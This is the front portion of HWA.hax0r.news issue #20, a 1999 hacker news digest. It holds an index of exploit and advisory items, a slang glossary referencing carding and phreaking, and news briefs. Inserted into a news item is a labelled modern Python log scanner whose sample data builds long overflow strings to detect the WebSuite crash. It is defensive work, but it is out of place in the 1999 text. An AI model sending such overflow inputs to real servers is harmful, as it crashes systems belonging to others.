hwa-hn20
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 20 Volume 1 1999 May 29th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
"There are two major products that come out of Berkeley: LSD and UNIX.
We don't believe this to be a coincidence."
-Jeremy S. Anderson
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth
and airportman for the Cubesoft bandwidth. Also shouts out to all our
mirror sites! tnx guys.
http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa
Synopsis
---------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, it's a labour
of love and will be continued for as long as I feel like it, I'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? There's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #20
=-----------------------------------------------------------------------=
"It is possible to provide security against other ills, but as far as
death is concerned, we men live in a city without walls."
-Epicurus
We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #20
=--------------------------------------------------------------------------=
"Wars have never hurt anybody except the people who die."
-Salvador Dali
[ INDEX ]
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Clinton Authorizes Cyber Attack??? ..............................
03.1 .. More on the 'Cyberwar'...........................................
04.0 .. RootFest Scares Officials In Minneapolis ........................
05.0 .. Australia Admits to Echelon .....................................
06.0 .. Banks to Test Home User PC Security .............................
07.0 .. EMPEROR VIRUS....................................................
08.0 .. WINHLP32.EXE BUFFER OVERRUN......................................
09.0 .. NAI ON GALADRIEL VIRUS...........................................
10.0 .. Know your enemy parts 1,2 and 3..................................
11.0 .. Cox Report Blasts DOE Computer Security .........................
12.0 .. Black Hat Briefings Announced ...................................
13.0 .. eEye Digital Security advisory: Multiple Web Interface Security Holes
14.0 .. Fun with ICQ.....................................................
15.0 .. FBI raids suspected hackers......................................
15.1 .. Real life hacker wargames........................................
16.0 .. MOD hacks Senate site............................................
17.0 .. Backdoor-G a new 'backorifice like' trojan and BO2K..............
18.0 .. [CNN] A Q&A with Emmanuel Goldstein, editor of 2600 magazine.....
19.0 .. [CNN] 'Hacking is a felony': Q&A with IBM's Charles Palmer.......
20.0 .. Five Busted in Florida ..........................................
21.0 .. Danes Finger Swede for Cracking 12,000 Systems ..................
22.0 .. EFA Plans Net Censorship Demonstrations..........................
23.0 .. Design Principles for Tamper-Resistant Smart Card Processors.....
24.0 .. Melissa finds a mate.............................................
25.0 .. punkz.com sets up a page for feedback on the presidential cyberwar
26.0 .. It's that time of month again, when the 26th rolls around, look out
27.0 .. Submission: "Be A Nice Hacker" by System.........................
28.0 .. Hacking Memes by Stephen Downes..................................
29.0 .. [ISN] House panel aims to bolster security law...................
30.0 .. [ISN] NSA Taps Universities For Info Security Studies............
31.0 .. [ISN] HushMail: free Web-based email with bulletproof encryption.
32.0 .. [ISN] E-Biz Bucks Lost Under SSL Strain..........................
33.0 .. [ISN] Bracing for guerrilla warfare in cyberspace................
34.0 .. [ISN] Prosecuting Lee Is Problematic.............................
35.0 .. [ISN] Slip of the Tongue Lightens up Encryption Hearing .........
36.0 .. [ISN] REVIEW: "Microsoft Windows NT 4.0 Security, Audit, and Control",
37.0 .. [ISN] LCI Intros SMARTpen Biometric Signature Authentication.....
38.0 .. [ISN] CFP: DISC 99 Computer Security 99..........................
39.0 .. [ISN] GAO: NASA systems full of holes............................
39.1 .. [ISN] Nasa vulnerabilities potentially deadly....................
40.0 .. Citrix WinFrame client for Linux vulnerability...................
41.0 .. [ISN] Top 10 candidates for a "duh" list (general sec/crypto)....
42.0 .. Seeing invisible fields and avoiding them...the MicroAlarm.......
43.0 .. RelayCheck v1.0 scan for smtp servers that will relay mail.......
44.0 .. Admintool exploit for Solaris (Updated) by Shadow Penguin Security
45.0 .. AppManager 2.0 for NT from NetIQ displays passwords in cleartext
46.0 .. Cgichck99 ported to Rebol from Su1d Sh3ll's .c code..............
47.0 .. ICSA certifies weak crypto as secure.............................
48.0 .. RAS and RRAS vulnerability.......................................
49.0 .. Whitepaper: The Unforeseen Consequences of Login Scripts By Dan Kaminsky
50.0 .. Vulnerability in pop2.imap.......................................
51.0 .. Infosec.19990526.compaq-im.a 'Compaq insight manager vulnerability'
52.0 .. Advisory: NT ODBC Remote Compromise...............................
53.0 .. Advisory: Buffer overflow in SmartDesk WebSuite v2.1..............
54.0 .. Security Leak with IBM Netfinity Remote Control Software..........
55.0 .. IBM eNetwork Firewall for AIX ....................................
=--------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
that's tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now... n.b. date and time may be pushed back, join the mailing list
for up to date information.......................................
Current dates: Aug 19th-22nd Niagara Falls... .................
HA.HA .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and it's hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINKS ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so I'll print any and all news but will quote
sources when the source is known, if it's good enough for CNN it's good
enough for me. And I'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance). Unless otherwise noted, like msgs
from lists or news from other sites, articles and information are compiled
and/or sourced by Cruciphux, no copyright claimed.
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ ...............http://www.l0pht.com/
NewsTrolls .......................http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/
News/Humour site+ ................http://www.innerpulse.com/
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care whether the article/email is to be used in an issue
or not and it may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list's charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector address
if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words
that you post on this list and that reproduction of those words without
your permission in any medium outside the distribution of this list may be
challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09
ISSN 1004-042X
Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist: Brendan Kehoe
Poof Reader: Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
And unofficially yet contributing too much to ignore ;)
Spikeman .........................: World media
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form. Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events it's a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 What's in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pigeonholed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, I'd highly recommend you get that book. It's almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the terms related to personal usage and use in this zine are
listed below: Some are very useful, others attempt to deny any possible
attempts at eschewing obfuscation by obscuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, no one can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but I'd
like to see more reader input, help me out here, what's good, what sucks
etc, not that I guarantee I'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Kevin Mitnick (watch yer back) Dicentra
vexxation sAs72 Spikeman Astral
p0lix Vexx g0at security
Shouts to tekz from HK for asking nicely in eye-are-see! ;-)
and to t4ck for making my night albeit I couldn't stick around for
the rest of the comedy routine. hacked star dot star with phf huh?
.... ;-))
and the #innerpulse, crew and some inhabitants of #leetchans ....
although I use the term 'leet loosely these days, <k0ff><snicker> ;)
kewl sites:
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ THE FIRST TRUE CYPHERPUNK NOVEL (CULT. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/culture/story/19720.html
Two generations of swashbuckling geeks tackle the forces of
evil. Call it hip, call it funny. But you can't call it
light summer reading. Declan McCullagh reviews Neal Stephenson's Cryptonomicon.
(checkout www.cryptonomicon.com also - Ed)
++ STUDENTS ARRESTED
From HNS http://www.net-security.org/
by BHZ, Friday 28th May 1999 on 12.02 am CET
Five Flagler Palm Coast High School students - one the son of a Bunnell city
commissioner - are facing a litany of criminal charges after authorities said they used
a computer trojan to hack into the school's network and commandeer teacher and
student files. Flagler County sheriff's deputies arrested the students Monday. All five
were taken to the Division of Youth Services in Daytona Beach before being released
to their parents.
++ FIGHT THE CENSORSHIP
From HNS http://www.net-security.org/
by BHZ, Thursday 27th May 1999 on 9.53 pm CET
Yesterday, the Australian Senate passed legislation to censor the Internet. In order to
protest censorship people will join with like minded groups and individuals in a day of
action against censorship. Download flyers here and be sure to visit the Electronic Frontiers
Australia site.
http://www.anatomy.usyd.edu.au/danny/freedom/march/
http://www.efa.org.au
++ SMARTDESK WEBSUITE BUFFER OVERFLOW
From HNS http://www.net-security.org/
by BHZ, Thursday 27th May 1999 on 9.47 pm CET
As posted on BugTraq by cmart: "WebSuite v2.1 will crash when an additional 250+
characters are appended after the site's URL on NT Server 4 and NT Workstation 4
boxes. Running on top of Windows 98 it will crash with 150+ characters appended
after the site's URL. After reinstalling on both platforms several times, the overflow
string length varied. Approximately 1 out of 8 times the overflow string went from 150
chars (Win98) to about 1000+ chars. It also went from 250+ chars (NT) to about
2000+ chars".
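Added example (not from the BugTraq post or from HWA): a defender's log check for this class of bug. It parses Common Log Format lines, measures how much text was appended beyond the site's URL, and flags requests that reach the per-platform lengths quoted above; the sample log lines, the threshold table and the function names are constructed for this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Common Log Format (CLF) line, as written by most 1990s web servers:
#   host ident authuser [date] "METHOD url HTTP/x.y" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Overflow lengths reported in the BugTraq post: ~150 extra characters
# crashed WebSuite v2.1 on Windows 98, ~250 on NT 4. The post notes the
# exact figure varied between installs, so these are lower bounds.
PLATFORM_THRESHOLDS = {"win98": 150, "nt4": 250}


@dataclass
class Finding:
    host: str
    time: str
    url: str
    extra_chars: int
    status: str


def parse_clf(line: str) -> Optional[dict]:
    """Return the named fields of one CLF line, or None if it does not parse."""
    m = CLF_RE.match(line.strip())
    return m.groupdict() if m else None


def extra_url_chars(url: str, site_prefix: str) -> int:
    """Count the characters appended beyond the expected site URL.

    The crash is triggered by text appended *after* the site's URL, so the
    interesting number is the surplus, not the absolute length.
    """
    if url.startswith(site_prefix):
        return len(url) - len(site_prefix)
    return len(url)  # unexpected prefix: count the whole thing


def scan_log(lines: List[str], platform: str = "nt4",
             site_prefix: str = "/") -> List[Finding]:
    """Flag requests whose appended length reaches the crash threshold."""
    threshold = PLATFORM_THRESHOLDS[platform]
    findings: List[Finding] = []
    for line in lines:
        rec = parse_clf(line)
        if rec is None:
            continue  # skip unparseable lines rather than abort the scan
        extra = extra_url_chars(rec["url"], site_prefix)
        if extra >= threshold:
            findings.append(Finding(rec["host"], rec["time"], rec["url"],
                                    extra, rec["status"]))
    return findings


# Constructed sample log (not a real capture): one normal request, one with
# 200 characters appended, one with 400 appended, and one corrupt line.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/May/1999:21:47:00 +0100] "GET /index.html HTTP/1.0" 200 1042',
    '10.0.0.9 - - [27/May/1999:21:47:05 +0100] "GET /' + "A" * 200 + ' HTTP/1.0" 404 -',
    '10.0.0.9 - - [27/May/1999:21:47:09 +0100] "GET /' + "A" * 400 + ' HTTP/1.0" 500 -',
    'garbage line that is not CLF',
]

if __name__ == "__main__":
    for platform in PLATFORM_THRESHOLDS:
        for f in scan_log(SAMPLE_LOG, platform=platform):
            print(f"[{platform}] {f.host} {f.time} status={f.status} "
                  f"+{f.extra_chars} chars: {f.url[:40]}...")
```

A server that dies mid-request may never write its own log line, so run the same check over any upstream proxy or firewall logs as well.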
++ GETTING ZAPPED FOR BETTER Z'S (TECH. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/19713.html
Relief is on the way for chronic snorers and their partners.
A new therapy uses radio waves to treat the breathing
disorder known as sleep apnea. By Kristen Philipkoski
Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Hacking the Palm Pilot demos...
Date: Thu, 20 May 1999 23:56:05 -0400
From: scosha@home.com
Organization: @Home Network
X-Mailer: Mozilla 4.51 [en]C-AtHome0404 (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: hwa@press.usmc.net
Subject: subject for newsleter
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
As we all know 3Com has recently released the Palm IIIx and V.
The Palm V demo in store displays is a dummy unit with a hunk of lead
